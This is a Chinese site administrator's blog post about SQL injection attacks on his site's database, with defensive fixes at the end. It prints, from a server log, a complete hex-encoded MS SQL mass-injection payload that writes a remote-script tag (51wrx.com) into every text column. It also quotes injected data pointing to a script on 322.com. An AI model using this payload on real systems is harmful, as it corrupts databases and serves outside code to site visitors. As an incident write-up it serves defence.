被SQL注入中,这帮无聊的人
网站从上周就开始遭到SQL注入,由于没时间检查问题,只是暂时处理以为是个例,被注入后的数据如下:
{type:1,url:'http://www.mmic.net.cn/pro/2021/478_5471_5471.html'}<script>http://322.com/2e.js</script>
类似上面,整个SNS数据库被插了个遍,随后写了个Replace替换掉JS问题解决,在被注入后,网站依然正常运行,这断代码执行不了,数据是JSON格式,注入之后SNS模板直接报错。
刚开始1,2天注入一次,我还是Replace,直到上周4,这帮人不干了,注入后数据变成{type:1,url:'http://www.mmic.net.cn/pro/2021/478_5471<script>http://322.com/2e.js</script>,数据完全被破坏,这帮人
真狠,搞不了你,破坏你的数据,让我损失了一周的数据。
一共42个数据库,单单SNS这个数据库被注入,分析日志发现如下:
2009-08-10 00:04:34 W3SV26095 211.103.158.102 GET /company-9.aspx id=1;dEcLaRe%20@S%20VaRcHaR(4000)%20
SeT%mailto:%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245
205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C7
37973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E44202
8622E7874797065D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970
653D31363729204F50454E2054616
26C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404
3205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40
542B275D20534554205B272B40432B2
75D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C73637269
7074207372633D687474703A2F2F35317772782E636F6D2F742E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655
F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415
445205461626C655F437572736F72%20aS%20VaRcHaR(4000));--eXeC(@s);
页面后面加个 id=...像这种页面没中招,URL重写过,何况也没用到ID变量,被注入的地方如下:
/mm/?uid=232&dEcLaRe%20@S%20VaR... 这种如果request不处理很可能中招.从上面分析看出注入手段全是GET,临时解决方案如下:
1,传过来的参数如果是数字一定检查是否数字类型
2,关键地方全部使用参数加存储过程
3,公共类过滤特殊参数
截止目前,提交过来的注入一天在30条左右,都没成功。
最后说一句,工作归工作,干不成不要破坏人家数据,小心以后生小孩没P眼。

浙公网安备 33010602011771号